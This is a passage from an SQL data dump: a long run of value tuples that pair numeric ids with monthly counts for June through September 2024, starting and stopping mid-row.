07,1,'202406',5),(3313,1,'202406',5),(3479,1,'202406',5),(3482,1,'202406',5),(3486,1,'202406',5),(3541,1,'202406',5),(3727,1,'202406',5),(3731,1,'202406',5),(3764,1,'202406',5),(4341,1,'202406',5),(4357,1,'202406',5),(4373,1,'202406',5),(4377,1,'202406',5),(4382,1,'202406',5),(4391,1,'202406',5),(4420,1,'202406',5),(4428,1,'202406',5),(4436,1,'202406',5),(4440,1,'202406',5),(4444,1,'202406',5),(4448,1,'202406',5),(4542,1,'202406',5),(4546,1,'202406',5),(4591,1,'202406',5),(4654,1,'202406',5),(4657,1,'202406',5),(4668,1,'202406',5),(4691,1,'202406',5),(4694,1,'202406',5),(4706,1,'202406',5),(4709,1,'202406',5),(4741,1,'202406',5),(4744,1,'202406',5),(4768,1,'202406',5),(4792,1,'202406',5),(4802,1,'202406',5),(4858,1,'202406',5),(4862,1,'202406',5),(4866,1,'202406',5),(4888,1,'202406',5),(4897,1,'202406',5),(4980,1,'202406',5),(4983,1,'202406',5),(5024,1,'202406',5),(5054,1,'202406',5),(5101,1,'202406',5),(5140,1,'202406',5),(5248,1,'202406',5),(5253,1,'202406',5),(5259,1,'202406',5),(5363,1,'202406',5),(102,1,'202406',6),(470,1,'202406',6),(485,1,'202406',6),(486,1,'202406',6),(570,1,'202406',6),(1602,1,'202406',6),(1604,1,'202406',6),(1606,1,'202406',6),(1610,1,'202406',6),(1701,1,'202406',6),(1707,1,'202406',6),(1713,1,'202406',6),(1720,1,'202406',6),(1724,1,'202406',6),(1766,1,'202406',6),(1768,1,'202406',6),(1770,1,'202406',6),(2178,1,'202406',6),(2804,1,'202406',6),(2813,1,'202406',6),(2956,1,'202406',6),(3023,1,'202406',6),(3034,1,'202406',6),(3038,1,'202406',6),(3045,1,'202406',6),(3083,1,'202406',6),(3102,1,'202406',6),(3104,1,'202406',6),(3124,1,'202406',6),(3259,1,'202406',6),(3273,1,'202406',6),(3282,1,'202406',6),(3285,1,'202406',6),(3297,1,'202406',6),(3316,1,'202406',6),(3430,1,'202406',6),(3438,1,'202406',6),(3498,1,'202406',6),(3721,1,'202406',6),(3724,1,'202406',6),(3735,1,'202406',6),(3738,1,'202406',6),(3746,1,'202406',6),(3749,1,'202406',6),(3752,1,'202406',6),(3771,1,'202406',6),(3777,1,'202406',6),(4323,1,'202406',6),(4326,1,'202406',6),(4329,1,'202406',6),(4332,1,'202406',6),(4338,1,'202406',6),(4368,1,'202406',6),(4387,1,'202406',6),(4396,1,'202406',6),(4412,1,'202406',6),(4514,1,'202406',6),(4566,1,'202406',6),(4660,1,'202406',6),(4677,1,'202406',6),(4681,1,'202406',6),(4688,1,'202406',6),(4697,1,'202406',6),(4700,1,'202406',6),(4703,1,'202406',6),(4722,1,'202406',6),(4747,1,'202406',6),(4750,1,'202406',6),(4756,1,'202406',6),(4762,1,'202406',6),(4771,1,'202406',6),(4776,1,'202406',6),(4797,1,'202406',6),(4976,1,'202406',6),(4977,1,'202406',6),(4988,1,'202406',6),(5028,1,'202406',6),(5058,1,'202406',6),(5067,1,'202406',6),(5076,1,'202406',6),(5125,1,'202406',6),(5134,1,'202406',6),(5137,1,'202406',6),(5256,1,'202406',6),(5271,1,'202406',6),(5276,1,'202406',6),(5280,1,'202406',6),(5289,1,'202406',6),(5298,1,'202406',6),(5323,1,'202406',6),(5330,1,'202406',6),(5374,1,'202406',6),(476,1,'202406',7),(487,1,'202406',7),(1586,1,'202406',7),(1588,1,'202406',7),(1596,1,'202406',7),(1598,1,'202406',7),(1600,1,'202406',7),(1612,1,'202406',7),(1614,1,'202406',7),(1699,1,'202406',7),(1722,1,'202406',7),(1778,1,'202406',7),(2148,1,'202406',7),(2154,1,'202406',7),(2297,1,'202406',7),(3004,1,'202406',7),(3027,1,'202406',7),(3092,1,'202406',7),(3117,1,'202406',7),(3247,1,'202406',7),(3271,1,'202406',7),(3489,1,'202406',7),(3531,1,'202406',7),(3710,1,'202406',7),(3714,1,'202406',7),(3774,1,'202406',7),(4238,1,'202406',7),(4275,1,'202406',7),(4301,1,'202406',7),(4335,1,'202406',7),(4400,1,'202406',7),(4404,1,'202406',7),(4408,1,'202406',7),(4424,1,'202406',7),(4457,1,'202406',7),(4517,1,'202406',7),(4524,1,'202406',7),(4529,1,'202406',7),(4582,1,'202406',7),(4645,1,'202406',7),(4674,1,'202406',7),(4712,1,'202406',7),(4759,1,'202406',7),(4996,1,'202406',7),(5050,1,'202406',7),(5071,1,'202406',7),(5128,1,'202406',7),(5304,1,'202406',7),(5307,1,'202406',7),(5310,1,'202406',7),(5317,1,'202406',7),(5320,1,'202406',7),(87,1,'202406',8),(467,1,'202406',8),(468,1,'202406',8),(471,1,'202406',8),(472,1,'202406',8),(474,1,'202406',8),(479,1,'202406',8),(1734,1,'202406',8),(1741,1,'202406',8),(1751,1,'202406',8),(2156,1,'202406',8),(2658,1,'202406',8),(2801,1,'202406',8),(2809,1,'202406',8),(3006,1,'202406',8),(3063,1,'202406',8),(3069,1,'202406',8),(3090,1,'202406',8),(4416,1,'202406',8),(4454,1,'202406',8),(4520,1,'202406',8),(4648,1,'202406',8),(4753,1,'202406',8),(4765,1,'202406',8),(5268,1,'202406',8),(5292,1,'202406',8),(5301,1,'202406',8),(74,1,'202406',9),(108,1,'202406',9),(469,1,'202406',9),(1582,1,'202406',9),(1737,1,'202406',9),(1749,1,'202406',9),(1780,1,'202406',9),(3030,1,'202406',9),(3041,1,'202406',9),(3534,1,'202406',9),(3742,1,'202406',9),(4551,1,'202406',9),(4663,1,'202406',9),(4685,1,'202406',9),(5295,1,'202406',9),(5314,1,'202406',9),(76,1,'202406',10),(84,1,'202406',10),(473,1,'202406',10),(2309,1,'202406',10),(2911,1,'202406',10),(3226,1,'202406',10),(5334,1,'202406',10),(1592,1,'202406',11),(3066,1,'202406',11),(4612,1,'202406',11),(335,1,'202406',12),(3060,1,'202406',12),(5131,1,'202406',12),(5353,1,'202406',12),(3781,1,'202406',13),(5356,1,'202406',13),(5359,1,'202406',13),(2457,1,'202406',15),(2904,1,'202406',15),(4930,1,'202406',15),(91,1,'202406',17),(2503,1,'202406',17),(5163,1,'202406',20),(68,1,'202406',22),(72,1,'202406',29),(89,1,'202406',37),(80,1,'202406',104),(9,1,'202406',1015),(1703,1,'202407',1),(1705,1,'202407',1),(1707,1,'202407',1),(1715,1,'202407',1),(1720,1,'202407',1),(1726,1,'202407',1),(1728,1,'202407',1),(1739,1,'202407',1),(1745,1,'202407',1),(1751,1,'202407',1),(1770,1,'202407',1),(2152,1,'202407',1),(2156,1,'202407',1),(2161,1,'202407',1),(2248,1,'202407',1),(2252,1,'202407',1),(2617,1,'202407',1),(2748,1,'202407',1),(2956,1,'202407',1),(2993,1,'202407',1),(3063,1,'202407',1),(3072,1,'202407',1),(3083,1,'202407',1),(3107,1,'202407',1),(3124,1,'202407',1),(3240,1,'202407',1),(3243,1,'202407',1),(3251,1,'202407',1),(3257,1,'202407',1),(3263,1,'202407',1),(3265,1,'202407',1),(3267,1,'202407',1),(3269,1,'202407',1),(3273,1,'202407',1),(3275,1,'202407',1),(3280,1,'202407',1),(3710,1,'202407',1),(3721,1,'202407',1),(3731,1,'202407',1),(3735,1,'202407',1),(3738,1,'202407',1),(3742,1,'202407',1),(3746,1,'202407',1),(3749,1,'202407',1),(3771,1,'202407',1),(3774,1,'202407',1),(4326,1,'202407',1),(4329,1,'202407',1),(4332,1,'202407',1),(4368,1,'202407',1),(4377,1,'202407',1),(4382,1,'202407',1),(4404,1,'202407',1),(4408,1,'202407',1),(4436,1,'202407',1),(4448,1,'202407',1),(4457,1,'202407',1),(4542,1,'202407',1),(4546,1,'202407',1),(4556,1,'202407',1),(4591,1,'202407',1),(4657,1,'202407',1),(4663,1,'202407',1),(4668,1,'202407',1),(4681,1,'202407',1),(4688,1,'202407',1),(4697,1,'202407',1),(4703,1,'202407',1),(4706,1,'202407',1),(4709,1,'202407',1),(4712,1,'202407',1),(4722,1,'202407',1),(4753,1,'202407',1),(4756,1,'202407',1),(4759,1,'202407',1),(4762,1,'202407',1),(4792,1,'202407',1),(4802,1,'202407',1),(4858,1,'202407',1),(4862,1,'202407',1),(4866,1,'202407',1),(4874,1,'202407',1),(4878,1,'202407',1),(4883,1,'202407',1),(4888,1,'202407',1),(4897,1,'202407',1),(4983,1,'202407',1),(4988,1,'202407',1),(5024,1,'202407',1),(5122,1,'202407',1),(5298,1,'202407',1),(5301,1,'202407',1),(102,1,'202407',2),(472,1,'202407',2),(478,1,'202407',2),(479,1,'202407',2),(480,1,'202407',2),(481,1,'202407',2),(1610,1,'202407',2),(1697,1,'202407',2),(1722,1,'202407',2),(1730,1,'202407',2),(1766,1,'202407',2),(1778,1,'202407',2),(1782,1,'202407',2),(2154,1,'202407',2),(2296,1,'202407',2),(2309,1,'202407',2),(2658,1,'202407',2),(2704,1,'202407',2),(2769,1,'202407',2),(2775,1,'202407',2),(2964,1,'202407',2),(2989,1,'202407',2),(2991,1,'202407',2),(3004,1,'202407',2),(3005,1,'202407',2),(3023,1,'202407',2),(3041,1,'202407',2),(3087,1,'202407',2),(3245,1,'202407',2),(3249,1,'202407',2),(3253,1,'202407',2),(3259,1,'202407',2),(3278,1,'202407',2),(3290,1,'202407',2),(3307,1,'202407',2),(3498,1,'202407',2),(3531,1,'202407',2),(3534,1,'202407',2),(3714,1,'202407',2),(3724,1,'202407',2),(3727,1,'202407',2),(3752,1,'202407',2),(3777,1,'202407',2),(4275,1,'202407',2),(4335,1,'202407',2),(4341,1,'202407',2),(4373,1,'202407',2),(4387,1,'202407',2),(4396,1,'202407',2),(4412,1,'202407',2),(4428,1,'202407',2),(4432,1,'202407',2),(4440,1,'202407',2),(4444,1,'202407',2),(4520,1,'202407',2),(4608,1,'202407',2),(4612,1,'202407',2),(4660,1,'202407',2),(4677,1,'202407',2),(4691,1,'202407',2),(4694,1,'202407',2),(4741,1,'202407',2),(4744,1,'202407',2),(4747,1,'202407',2),(4768,1,'202407',2),(4797,1,'202407',2),(4870,1,'202407',2),(4893,1,'202407',2),(4976,1,'202407',2),(4996,1,'202407',2),(5020,1,'202407',2),(5028,1,'202407',2),(5037,1,'202407',2),(5042,1,'202407',2),(5046,1,'202407',2),(5050,1,'202407',2),(5054,1,'202407',2),(5125,1,'202407',2),(5128,1,'202407',2),(5131,1,'202407',2),(5137,1,'202407',2),(5153,1,'202407',2),(5248,1,'202407',2),(5253,1,'202407',2),(5271,1,'202407',2),(5289,1,'202407',2),(5295,1,'202407',2),(5326,1,'202407',2),(5374,1,'202407',2),(5383,1,'202407',2),(467,1,'202407',3),(471,1,'202407',3),(482,1,'202407',3),(483,1,'202407',3),(486,1,'202407',3),(488,1,'202407',3),(570,1,'202407',3),(1604,1,'202407',3),(1695,1,'202407',3),(1701,1,'202407',3),(1711,1,'202407',3),(1713,1,'202407',3),(1718,1,'202407',3),(1724,1,'202407',3),(1737,1,'202407',3),(1747,1,'202407',3),(1772,1,'202407',3),(1776,1,'202407',3),(1780,1,'202407',3),(2150,1,'202407',3),(2293,1,'202407',3),(2297,1,'202407',3),(2558,1,'202407',3),(2751,1,'202407',3),(2804,1,'202407',3),(2813,1,'202407',3),(2911,1,'202407',3),(3006,1,'202407',3),(3027,1,'202407',3),(3034,1,'202407',3),(3038,1,'202407',3),(3045,1,'202407',3),(3092,1,'202407',3),(3096,1,'202407',3),(3102,1,'202407',3),(3104,1,'202407',3),(3117,1,'202407',3),(3127,1,'202407',3),(3226,1,'202407',3),(3229,1,'202407',3),(3261,1,'202407',3),(3271,1,'202407',3),(3282,1,'202407',3),(3287,1,'202407',3),(3313,1,'202407',3),(3316,1,'202407',3),(3486,1,'202407',3),(4238,1,'202407',3),(4323,1,'202407',3),(4363,1,'202407',3),(4391,1,'202407',3),(4400,1,'202407',3),(4424,1,'202407',3),(4454,1,'202407',3),(4514,1,'202407',3),(4524,1,'202407',3),(4566,1,'202407',3),(4587,1,'202407',3),(4648,1,'202407',3),(4674,1,'202407',3),(4765,1,'202407',3),(5033,1,'202407',3),(5058,1,'202407',3),(5067,1,'202407',3),(5134,1,'202407',3),(5140,1,'202407',3),(5157,1,'202407',3),(5256,1,'202407',3),(5264,1,'202407',3),(5276,1,'202407',3),(5280,1,'202407',3),(5292,1,'202407',3),(5307,1,'202407',3),(5310,1,'202407',3),(5314,1,'202407',3),(5317,1,'202407',3),(5320,1,'202407',3),(5323,1,'202407',3),(5378,1,'202407',3),(469,1,'202407',4),(477,1,'202407',4),(1588,1,'202407',4),(1590,1,'202407',4),(1699,1,'202407',4),(1743,1,'202407',4),(1774,1,'202407',4),(2148,1,'202407',4),(2159,1,'202407',4),(2165,1,'202407',4),(2178,1,'202407',4),(2609,1,'202407',4),(2801,1,'202407',4),(2809,1,'202407',4),(3079,1,'202407',4),(3090,1,'202407',4),(3097,1,'202407',4),(3109,1,'202407',4),(3430,1,'202407',4),(3482,1,'202407',4),(4301,1,'202407',4),(4416,1,'202407',4),(4529,1,'202407',4),(4551,1,'202407',4),(4582,1,'202407',4),(4651,1,'202407',4),(4654,1,'202407',4),(4700,1,'202407',4),(4771,1,'202407',4),(4776,1,'202407',4),(4980,1,'202407',4),(5062,1,'202407',4),(5080,1,'202407',4),(5259,1,'202407',4),(5304,1,'202407',4),(5330,1,'202407',4),(476,1,'202407',5),(484,1,'202407',5),(485,1,'202407',5),(1586,1,'202407',5),(1606,1,'202407',5),(1608,1,'202407',5),(1614,1,'202407',5),(1709,1,'202407',5),(1732,1,'202407',5),(1768,1,'202407',5),(2063,1,'202407',5),(2965,1,'202407',5),(3030,1,'202407',5),(3066,1,'202407',5),(3069,1,'202407',5),(3438,1,'202407',5),(3489,1,'202407',5),(4357,1,'202407',5),(4420,1,'202407',5),(4685,1,'202407',5),(5071,1,'202407',5),(5076,1,'202407',5),(5356,1,'202407',5),(1544,1,'202407',6),(1584,1,'202407',6),(1600,1,'202407',6),(1612,1,'202407',6),(1741,1,'202407',6),(1749,1,'202407',6),(3285,1,'202407',6),(3541,1,'202407',6),(4338,1,'202407',6),(4517,1,'202407',6),(4750,1,'202407',6),(5101,1,'202407',6),(5146,1,'202407',6),(1592,1,'202407',7),(1596,1,'202407',7),(1598,1,'202407',7),(1602,1,'202407',7),(3247,1,'202407',7),(3297,1,'202407',7),(3479,1,'202407',7),(3781,1,'202407',7),(4977,1,'202407',7),(5363,1,'202407',7),(468,1,'202407',8),(2457,1,'202407',8),(5268,1,'202407',8),(487,1,'202407',9),(1594,1,'202407',9),(1734,1,'202407',9),(3764,1,'202407',9),(5353,1,'202407',9),(5359,1,'202407',9),(1582,1,'202407',10),(4645,1,'202407',10),(74,1,'202407',12),(5163,1,'202407',13),(5334,1,'202407',13),(335,1,'202407',16),(474,1,'202407',16),(2503,1,'202407',16),(470,1,'202407',17),(84,1,'202407',18),(473,1,'202407',18),(87,1,'202407',19),(91,1,'202407',19),(108,1,'202407',20),(2904,1,'202407',21),(4930,1,'202407',22),(76,1,'202407',26),(72,1,'202407',27),(3060,1,'202407',27),(89,1,'202407',30),(68,1,'202407',40),(80,1,'202407',141),(9,1,'202407',1097),(1590,1,'202408',1),(1600,1,'202408',1),(5062,1,'202408',1),(102,1,'202408',2),(110,1,'202408',2),(1584,1,'202408',2),(1588,1,'202408',2),(1604,1,'202408',2),(2293,1,'202408',2),(2296,1,'202408',2),(2769,1,'202408',2),(2965,1,'202408',2),(3006,1,'202408',2),(3267,1,'202408',2),(4404,1,'202408',2),(4444,1,'202408',2),(4694,1,'202408',2),(4878,1,'202408',2),(4980,1,'202408',2),(5033,1,'202408',2),(5067,1,'202408',2),(5080,1,'202408',2),(5134,1,'202408',2),(5140,1,'202408',2),(5146,1,'202408',2),(5153,1,'202408',2),(5248,1,'202408',2),(5304,1,'202408',2),(5307,1,'202408',2),(5320,1,'202408',2),(106,1,'202408',3),(477,1,'202408',3),(478,1,'202408',3),(1608,1,'202408',3),(1610,1,'202408',3),(1695,1,'202408',3),(1701,1,'202408',3),(1705,1,'202408',3),(1711,1,'202408',3),(1713,1,'202408',3),(1718,1,'202408',3),(1720,1,'202408',3),(1724,1,'202408',3),(1730,1,'202408',3),(1732,1,'202408',3),(1737,1,'202408',3),(1739,1,'202408',3),(1741,1,'202408',3),(1747,1,'202408',3),(1766,1,'202408',3),(1770,1,'202408',3),(1782,1,'202408',3),(2165,1,'202408',3),(2248,1,'202408',3),(2252,1,'202408',3),(2558,1,'202408',3),(2609,1,'202408',3),(2658,1,'202408',3),(2911,1,'202408',3),(2956,1,'202408',3),(2991,1,'202408',3),(2993,1,'202408',3),(3023,1,'202408',3),(3034,1,'202408',3),(3072,1,'202408',3),(3087,1,'202408',3),(3092,1,'202408',3),(3097,1,'202408',3),(3104,1,'202408',3),(3107,1,'202408',3),(3127,1,'202408',3),(3226,1,'202408',3),(3229,1,'202408',3),(3243,1,'202408',3),(3245,1,'202408',3),(3251,1,'202408',3),(3263,1,'202408',3),(3273,1,'202408',3),(3275,1,'202408',3),(3278,1,'202408',3),(3287,1,'202408',3),(3313,1,'202408',3),(3438,1,'202408',3),(3479,1,'202408',3),(3482,1,'202408',3),(3486,1,'202408',3),(3498,1,'202408',3),(3531,1,'202408',3),(3541,1,'202408',3),(3721,1,'202408',3),(3724,1,'202408',3),(3727,1,'202408',3),(3731,1,'202408',3),(3735,1,'202408',3),(3742,1,'202408',3),(4275,1,'202408',3),(4363,1,'202408',3),(4368,1,'202408',3),(4391,1,'202408',3),(4400,1,'202408',3),(4408,1,'202408',3),(4412,1,'202408',3),(4424,1,'202408',3),(4436,1,'202408',3),(4514,1,'202408',3),(4546,1,'202408',3),(4582,1,'202408',3),(4587,1,'202408',3),(4591,1,'202408',3),(4612,1,'202408',3),(4668,1,'202408',3),(4681,1,'202408',3),(4685,1,'202408',3),(4688,1,'202408',3),(4691,1,'202408',3),(4700,1,'202408',3),(4703,1,'202408',3),(4706,1,'202408',3),(4712,1,'202408',3),(4722,1,'202408',3),(4759,1,'202408',3),(4762,1,'202408',3),(4768,1,'202408',3),(4771,1,'202408',3),(4776,1,'202408',3),(4797,1,'202408',3),(4802,1,'202408',3),(4858,1,'202408',3),(4862,1,'202408',3),(4883,1,'202408',3),(4983,1,'202408',3),(4988,1,'202408',3),(5020,1,'202408',3),(5024,1,'202408',3),(5042,1,'202408',3),(5046,1,'202408',3),(5054,1,'202408',3),(5137,1,'202408',3),(5253,1,'202408',3),(5259,1,'202408',3),(5264,1,'202408',3),(5268,1,'202408',3),(5280,1,'202408',3),(5317,1,'202408',3),(5323,1,'202408',3),(5326,1,'202408',3),(5374,1,'202408',3),(5378,1,'202408',3),(5383,1,'202408',3),(1544,1,'202408',4),(1592,1,'202408',4),(1606,1,'202408',4),(1612,1,'202408',4),(1697,1,'202408',4),(1703,1,'202408',4),(1707,1,'202408',4),(1709,1,'202408',4),(1726,1,'202408',4),(1745,1,'202408',4),(1751,1,'202408',4),(1780,1,'202408',4),(2063,1,'202408',4),(2148,1,'202408',4),(2154,1,'202408',4),(2159,1,'202408',4),(2161,1,'202408',4),(2801,1,'202408',4),(2809,1,'202408',4),(2813,1,'202408',4),(2989,1,'202408',4),(3005,1,'202408',4),(3027,1,'202408',4),(3038,1,'202408',4),(3069,1,'202408',4),(3079,1,'202408',4),(3090,1,'202408',4),(3096,1,'202408',4),(3109,1,'202408',4),(3117,1,'202408',4),(3124,1,'202408',4),(3240,1,'202408',4),(3249,1,'202408',4),(3259,1,'202408',4),(3265,1,'202408',4),(3285,1,'202408',4),(3290,1,'202408',4),(3307,1,'202408',4),(3316,1,'202408',4),(3534,1,'202408',4),(3714,1,'202408',4),(3738,1,'202408',4),(3752,1,'202408',4),(3774,1,'202408',4),(3777,1,'202408',4),(4323,1,'202408',4),(4329,1,'202408',4),(4332,1,'202408',4),(4335,1,'202408',4),(4341,1,'202408',4),(4382,1,'202408',4),(4387,1,'202408',4),(4420,1,'202408',4),(4428,1,'202408',4),(4432,1,'202408',4),(4448,1,'202408',4),(4454,1,'202408',4),(4517,1,'202408',4),(4524,1,'202408',4),(4566,1,'202408',4),(4608,1,'202408',4),(4651,1,'202408',4),(4654,1,'202408',4),(4657,1,'202408',4),(4697,1,'202408',4),(4741,1,'202408',4),(4747,1,'202408',4),(4750,1,'202408',4),(4753,1,'202408',4),(4756,1,'202408',4),(4870,1,'202408',4),(4874,1,'202408',4),(4888,1,'202408',4),(4897,1,'202408',4),(4976,1,'202408',4),(5028,1,'202408',4),(5037,1,'202408',4),(5050,1,'202408',4),(5058,1,'202408',4),(5071,1,'202408',4),(5122,1,'202408',4),(5125,1,'202408',4),(5157,1,'202408',4),(5256,1,'202408',4),(5289,1,'202408',4),(5292,1,'202408',4),(5295,1,'202408',4),(5298,1,'202408',4),(5301,1,'202408',4),(5310,1,'202408',4),(5314,1,'202408',4),(5330,1,'202408',4),(5363,1,'202408',4),(467,1,'202408',5),(469,1,'202408',5),(472,1,'202408',5),(474,1,'202408',5),(476,1,'202408',5),(484,1,'202408',5),(488,1,'202408',5),(570,1,'202408',5),(1614,1,'202408',5),(1715,1,'202408',5),(1722,1,'202408',5),(1734,1,'202408',5),(1749,1,'202408',5),(1772,1,'202408',5),(1776,1,'202408',5),(1778,1,'202408',5),(2152,1,'202408',5),(2178,1,'202408',5),(2617,1,'202408',5),(2704,1,'202408',5),(2748,1,'202408',5),(2751,1,'202408',5),(2775,1,'202408',5),(2804,1,'202408',5),(3041,1,'202408',5),(3045,1,'202408',5),(3063,1,'202408',5),(3083,1,'202408',5),(3269,1,'202408',5),(3271,1,'202408',5),(3280,1,'202408',5),(3430,1,'202408',5),(3746,1,'202408',5),(3771,1,'202408',5),(4326,1,'202408',5),(4373,1,'202408',5),(4377,1,'202408',5),(4440,1,'202408',5),(4457,1,'202408',5),(4529,1,'202408',5),(4551,1,'202408',5),(4556,1,'202408',5),(4660,1,'202408',5),(4677,1,'202408',5),(4709,1,'202408',5),(4744,1,'202408',5),(4792,1,'202408',5),(4893,1,'202408',5),(4996,1,'202408',5),(5128,1,'202408',5),(5271,1,'202408',5),(5276,1,'202408',5),(479,1,'202408',6),(482,1,'202408',6),(483,1,'202408',6),(1586,1,'202408',6),(1598,1,'202408',6),(1602,1,'202408',6),(1728,1,'202408',6),(1768,1,'202408',6),(2150,1,'202408',6),(2156,1,'202408',6),(2297,1,'202408',6),(2309,1,'202408',6),(2964,1,'202408',6),(3004,1,'202408',6),(3060,1,'202408',6),(3253,1,'202408',6),(3261,1,'202408',6),(3282,1,'202408',6),(3297,1,'202408',6),(3489,1,'202408',6),(3749,1,'202408',6),(4238,1,'202408',6),(4396,1,'202408',6),(4416,1,'202408',6),(4542,1,'202408',6),(4645,1,'202408',6),(4765,1,'202408',6),(5076,1,'202408',6),(5101,1,'202408',6),(5131,1,'202408',6),(5334,1,'202408',6),(5353,1,'202408',6),(74,1,'202408',7),(480,1,'202408',7),(485,1,'202408',7),(486,1,'202408',7),(1699,1,'202408',7),(1774,1,'202408',7),(3102,1,'202408',7),(3257,1,'202408',7),(4301,1,'202408',7),(4338,1,'202408',7),(4674,1,'202408',7),(4866,1,'202408',7),(4977,1,'202408',7),(87,1,'202408',8),(468,1,'202408',8),(471,1,'202408',8),(481,1,'202408',8),(487,1,'202408',8),(1594,1,'202408',8),(1743,1,'202408',8),(3030,1,'202408',8),(3247,1,'202408',8),(3710,1,'202408',8),(4663,1,'202408',8),(76,1,'202408',9),(335,1,'202408',9),(3764,1,'202408',9),(4648,1,'202408',9),(5356,1,'202408',9),(5359,1,'202408',9),(108,1,'202408',10),(2457,1,'202408',10),(2904,1,'202408',10),(3066,1,'202408',10),(4357,1,'202408',10),(4520,1,'202408',10),(84,1,'202408',11),(2503,1,'202408',11),(4930,1,'202408',11),(5163,1,'202408',12),(1582,1,'202408',13),(1596,1,'202408',14),(473,1,'202408',15),(89,1,'202408',16),(470,1,'202408',17),(3781,1,'202408',18),(72,1,'202408',21),(91,1,'202408',21),(68,1,'202408',30),(80,1,'202408',125),(9,1,'202408',857),(106,1,'202409',2),(110,1,'202409',2),(485,1,'202409',2),(570,1,'202409',2),(1707,1,'202409',2),(1715,1,'202409',2),(1720,1,'202409',2),(1730,1,'202409',2),(1751,1,'202409',2),(2156,1,'202409',2),(2993,1,'202409',2),(3079,1,'202409',2),(3092,1,'202409',2),(3096,1,'202409',2),(3097,1,'202409',2),(3104,1,'202409',2),(3109,1,'202409',2),(3226,1,'202409',2),(3265,1,'202409',2),(3269,1,'202409',2),(3541,1,'202409',2),(4436,1,'202409',2),(4608,1,'202409',2),(87,1,'202409',3),(471,1,'202409',3),(472,1,'202409',3),(480,1,'202409',3),(487,1,'202409',3),(1697,1,'202409',3),(1701,1,'202409',3),(1703,1,'202409',3),(1711,1,'202409',3),(1718,1,'202409',3),(1724,1,'202409',3),(1739,1,'202409',3),(1741,1,'202409',3),(1747,1,'202409',3),(1778,1,'202409',3),(1780,1,'202409',3),(2063,1,'202409',3),(2150,1,'202409',3),(2165,1,'202409',3),(2296,1,'202409',3),(2609,1,'202409',3),(2991,1,'202409',3),(3034,1,'202409',3),(3087,1,'202409',3),(3240,1,'202409',3),(3243,1,'202409',3),(3259,1,'202409',3),(3263,1,'202409',3),(3267,1,'202409',3),(3271,1,'202409',3),(3278,1,'202409',3),(3282,1,'202409',3),(3285,1,'202409',3),(3307,1,'202409',3),(3313,1,'202409',3),(3714,1,'202409',3),(3771,1,'202409',3),(4275,1,'202409',3),(4368,1,'202409',3),(4382,1,'202409',3),(4387,1,'202409',3),(4408,1,'202409',3),(4416,1,'202409',3),(4428,1,'202409',3),(4444,1,'202409',3),(4542,1,'202409',3),(4556,1,'202409',3),(4587,1,'202409',3),(4612,1,'202409',3),(4681,1,'202409',3),(4688,1,'202409',3),(4706,1,'202409',3),(4792,1,'202409',3),(4802,1,'202409',3),(4858,1,'202409',3),(4878,1,'202409',3),(4883,1,'202409',3),(4888,1,'202409',3),(4893,1,'202409',3),(4897,1,'202409',3),(5020,1,'202409',3),(5024,1,'202409',3),(5042,1,'202409',3),(5058,1,'202409',3),(5067,1,'202409',3),(5137,1,'202409',3),(5146,1,'202409',3),(5153,1,'202409',3),(5248,1,'202409',3),(5253,1,'202409',3),(5320,1,'202409',3),(5323,1,'202409',3),(5326,1,'202409',3),(5363,1,'202409',3),(5374,1,'202409',3),(5383,1,'202409',3),(102,1,'202409',4),(108,1,'202409',4),(467,1,'202409',4),(469,1,'202409',4),(474,1,'202409',4),(476,1,'202409',4),(481,1,'202409',4),(482,1,'202409',4),(483,1,'202409',4),(484,1,'202409',4),(1590,1,'202409',4),(1598,1,'202409',4),(1695,1,'202409',4),(1705,1,'202409',4),(1726,1,'202409',4),(1728,1,'202409',4),(1732,1,'202409',4),(1737,1,'202409',4),(2154,1,'202409',4),(2178,1,'202409',4),(2248,1,'202409',4),(2297,1,'202409',4),(2658,1,'202409',4),(2748,1,'202409',4),(2813,1,'202409',4),(2956,1,'202409',4),(3023,1,'202409',4),(3027,1,'202409',4),(3038,1,'202409',4),(3045,1,'202409',4),(3060,1,'202409',4),(3072,1,'202409',4),(3090,1,'202409',4),(3102,1,'202409',4),(3107,1,'202409',4),(3117,1,'202409',4),(3124,1,'202409',4),(3127,1,'202409',4),(3229,1,'202409',4),(3245,1,'202409',4),(3249,1,'202409',4),(3251,1,'202409',4),(3257,1,'202409',4),(3273,1,'202409',4),(3287,1,'202409',4),(3438,1,'202409',4),(3479,1,'202409',4),(3482,1,'202409',4),(3489,1,'202409',4),(3498,1,'202409',4),(3531,1,'202409',4),(3534,1,'202409',4),(3724,1,'202409',4),(3727,1,'202409',4),(3731,1,'202409',4),(3735,1,'202409',4),(3738,1,'202409',4),(3742,1,'202409',4),(3749,1,'202409',4),(3752,1,'202409',4),(3774,1,'202409',4),(4238,1,'202409',4),(4326,1,'202409',4),(4329,1,'202409',4),(4335,1,'202409',4),(4338,1,'202409',4),(4341,1,'202409',4),(4363,1,'202409',4),(4404,1,'202409',4),(4420,1,'202409',4),(4432,1,'202409',4),(4440,1,'202409',4),(4514,1,'202409',4),(4517,1,'202409',4),(4529,1,'202409',4),(4582,1,'202409',4),(4591,1,'202409',4),(4651,1,'202409',4),(4654,1,'202409',4),(4657,1,'202409',4),(4668,1,'202409',4),(4685,1,'202409',4),(4691,1,'202409',4),(4694,1,'202409',4),(4697,1,'202409',4),(4703,1,'202409',4),(4712,1,'202409',4),(4722,1,'202409',4),(4741,1,'202409',4),(4744,1,'202409',4),(4747,1,'202409',4),(4756,1,'202409',4),(4762,1,'202409',4),(4765,1,'202409',4),(4776,1,'202409',4),(4797,1,'202409',4),(4976,1,'202409',4),(4980,1,'202409',4),(4983,1,'202409',4),(4988,1,'202409',4),(5028,1,'202409',4),(5037,1,'202409',4),(5050,1,'202409',4),(5054,1,'202409',4),(5062,1,'202409',4),(5080,1,'202409',4),(5122,1,'202409',4),(5128,1,'202409',4),(5134,1,'202409',4),(5157,1,'202409',4),(5256,1,'202409',4),(5268,1,'202409',4),(5271,1,'202409',4),(5280,1,'202409',4),(5289,1,'202409',4),(5292,1,'202409',4),(5295,1,'202409',4),(5301,1,'202409',4),(5304,1,'202409',4),(5307,1,'202409',4),(5378,1,'202409',4),(76,1,'202409',5),(335,1,'202409',5),(468,1,'202409',5),(1584,1,'202409',5),(1600,1,'202409',5),(1606,1,'202409',5),(1608,1,'202409',5),(1709,1,'202409',5),(1713,1,'202409',5),(1745,1,'202409',5),(1770,1,'202409',5),(1774,1,'202409',5),(1782,1,'202409',5),(2152,1,'202409',5),(2159,1,'202409',5),(2161,1,'202409',5),(2252,1,'202409',5),(2558,1,'202409',5),(2801,1,'202409',5),(2804,1,'202409',5),(2904,1,'202409',5),(2989,1,'202409',5),(